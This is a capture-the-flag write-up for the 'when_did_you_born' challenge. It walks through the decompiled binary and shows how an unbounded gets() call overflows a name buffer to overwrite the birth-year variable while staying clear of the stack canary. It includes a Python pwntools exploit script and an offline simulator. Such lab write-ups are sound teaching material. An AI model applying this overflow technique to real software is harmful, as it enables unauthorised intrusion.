攻防世界 when_did_you_born writeup

After downloading the binary, take a look at it on Linux.

It is a 64-bit ELF and it has stack canary protection enabled.

Load it into IDA (64-bit).

Press F5 to decompile:

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  __int64 result; // rax
  char v4[8]; // [rsp+0h] [rbp-20h] BYREF   <- 8-byte name buffer, written by gets()
  unsigned int v5[4]; // [rsp+8h] [rbp-18h] BYREF   <- birth year, directly above v4
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]        <- stack canary copy

  v6 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("What's Your Birth?");
  __isoc99_scanf("%d", v5);
  while ( getchar() != 10 )              // drain the rest of the line
    ;
  if ( v5[0] == 1926 )                   // first check: 1926 is rejected
  {
    puts("You Cannot Born In 1926!");
    result = 0LL;
  }
  else
  {
    puts("What's Your Name?");
    gets(v4);                            // unbounded read into an 8-byte buffer
    printf("You Are Born In %d\n", v5[0]);
    if ( v5[0] == 1926 )                 // second check: 1926 is required
    {
      puts("You Shall Have Flag.");
      system("cat flag");
    }
    else
    {
      puts("You Are Naive.");
      puts("You Speed One Second Here.");
    }
    result = 0LL;
  }
  return result;
}

There is a call to gets(). gets() performs no bounds checking on the destination buffer, so whenever it appears it is almost always where the vulnerability is.

Look at the address of v4 and the stack layout.

v4 sits at rbp-0x20 and v5 at rbp-0x18, so they are 0x20-0x18 = 8 bytes apart: the first 8 bytes written by gets(v4) fill v4, and the bytes after that land in v5[0]. The canary (v6) is at rbp-0x8, so a write of 8 + 4 bytes stays well below it and the canary check still passes.

Analysing the logic: if v5 is 1926 the program exits right after the first check, but the flag is only printed when v5 == 1926 at the second check. Taken at face value this is a contradiction.

The key to this challenge is to assign v5 a second time through v4: answer the first question with anything other than 1926, then overflow v4 via gets() so that v5 becomes 1926 before the second check.

Now write the script.
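The original script is not included on this page, so the following is an added example rather than the author's own code. It derives the payload from the frame offsets in the decompilation (v4 at rbp-0x20, v5 at rbp-0x18, canary at rbp-0x8), models main()'s stack frame in pure Python so the overflow can be checked offline, and includes an optional pwntools delivery function (pwntools is assumed to be installed; host and port come from the command line and are not taken from the page).

```python
import struct

# Frame layout recovered from the IDA decompilation, as offsets from rbp-0x20
# (the lowest address in the frame, where v4 starts).
FRAME_SIZE = 0x20          # v4 starts at rbp-0x20, rbp-0 is the frame top
V4_OFF = 0x00              # char v4[8]          at rbp-0x20
V5_OFF = 0x08              # unsigned int v5[4]  at rbp-0x18
CANARY_OFF = 0x18          # unsigned __int64 v6 at rbp-0x08 (stack canary)
TARGET_YEAR = 1926


def build_payload(year=TARGET_YEAR):
    """Line to feed gets(v4): 8 filler bytes, then `year` lands in v5[0]."""
    padding = b"A" * (V5_OFF - V4_OFF)              # fills v4 exactly
    payload = padding + struct.pack("<I", year)      # overwrites v5[0]
    # gets() appends a NUL after the input; everything must stay below the canary.
    assert len(payload) + 1 <= CANARY_OFF, "payload would clobber the canary"
    return payload


def simulate(birth_line, name_line, canary=0x1122334455667700):
    """Pure-Python model of main(): returns the message the program would print.

    birth_line is what scanf("%d") consumes, name_line what gets(v4) consumes
    (both without the trailing newline). The canary value is a constructed
    placeholder; the real one is random per process.
    """
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<Q", frame, CANARY_OFF, canary)

    # __isoc99_scanf("%d", v5): only v5[0] is written
    struct.pack_into("<I", frame, V5_OFF, int(birth_line) & 0xFFFFFFFF)
    if struct.unpack_from("<I", frame, V5_OFF)[0] == TARGET_YEAR:
        return "You Cannot Born In 1926!"

    # gets(v4): copies the whole line plus a NUL with no length check,
    # so a long line runs past v4 into v5 and eventually the canary.
    data = bytes(name_line) + b"\x00"
    frame[V4_OFF:V4_OFF + len(data)] = data

    # Epilogue: __readfsqword(0x28) is compared against the saved copy.
    if struct.unpack_from("<Q", frame, CANARY_OFF)[0] != canary:
        return "*** stack smashing detected ***"

    if struct.unpack_from("<I", frame, V5_OFF)[0] == TARGET_YEAR:
        return "You Shall Have Flag."          # system("cat flag") runs here
    return "You Are Naive."


def main(argv):
    """Deliver the payload to the live service with pwntools.

    usage: python3 exploit.py HOST PORT   (HOST/PORT are whatever the challenge gives you)
    """
    from pwn import remote
    host, port = argv[1], int(argv[2])
    io = remote(host, port)
    io.sendlineafter(b"Birth?", b"2000")             # anything except 1926 passes check 1
    io.sendlineafter(b"Name?", build_payload())       # overflow sets v5[0] = 1926 for check 2
    print(io.recvall(timeout=2).decode(errors="replace"))


if __name__ == "__main__":
    import sys
    main(sys.argv)
```

The simulator is the useful part for checking the reasoning: build_payload() flips the result from "You Are Naive." to "You Shall Have Flag.", while a carelessly long name (more than 0x18 bytes) reaches the canary and the model reports a stack-smash instead of the flag, which is exactly why the payload stops at 12 bytes.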

cat flag


Reposted from blog.csdn.net/wuyvle/article/details/112972598